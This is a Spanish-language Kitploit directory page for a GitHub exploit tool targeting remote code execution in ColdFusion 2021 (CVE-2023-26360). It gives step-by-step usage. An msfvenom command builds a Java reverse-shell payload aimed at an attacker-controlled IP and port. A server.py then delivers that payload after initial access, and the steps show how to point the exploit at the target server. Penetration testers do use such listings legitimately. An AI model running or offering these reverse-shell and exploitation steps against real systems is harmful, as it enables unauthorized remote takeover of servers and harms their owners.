Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-26360-RCE — Exploit para ejecución remota de código en ColdFusion 2021 (CVE-2023-26360) | Kitploit
Herramientas/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Exploit para ejecución remota de código en ColdFusion 2021 (CVE-2023-26360)

Ver Repositorio
113hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-26360 - Ejecución Remota de Código en ColdFusion 2021

A veces, los scripts no funcionan en el primer intento. Inténtalo varias veces para que funcione.

Cómo ejecutar

Crear un payload con msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Iniciando server.py

  • Este servidor enviará el payload al servidor ColdFusion después del acceso inicial con cve.2023-26360.py, por lo que debe inicializarse primero.
root@kitploit:~
python3 server.py 8000
  • El argumento 8000 es el puerto en el que el servidor estará escuchando.

  • Es importante tener en cuenta que la línea 12 configura la dirección IP del servidor, así que cámbiala:

  • root@kitploit:~
    s.bind(('192.168.56.1',port))
    

    Ejecutar cve-2023-26360.py

    • Para ejecutar el exploit, ejecuta:
    root@kitploit:~
    python3 cve-2023-26360.py 8000
    
    • Al igual que en server.py, el argumento 8000 es el puerto en el que escuchará server.py. Por lo tanto, debe ser el mismo en ambos comandos.

    • La línea 8 en cve-2023-26360.py establece la dirección IP en la que escuchará server.py. Es necesario configurarla correctamente.

    • La línea 11 en cve-2023-26360.py establece la dirección IP del servidor ColdFusion, así que cámbiala:

    root@kitploit:~
    url = "http://192.168.56.102:8500"
    

    Probado en

    • ColdFusion 2021 - Windows Server 2019
    Descargar herramienta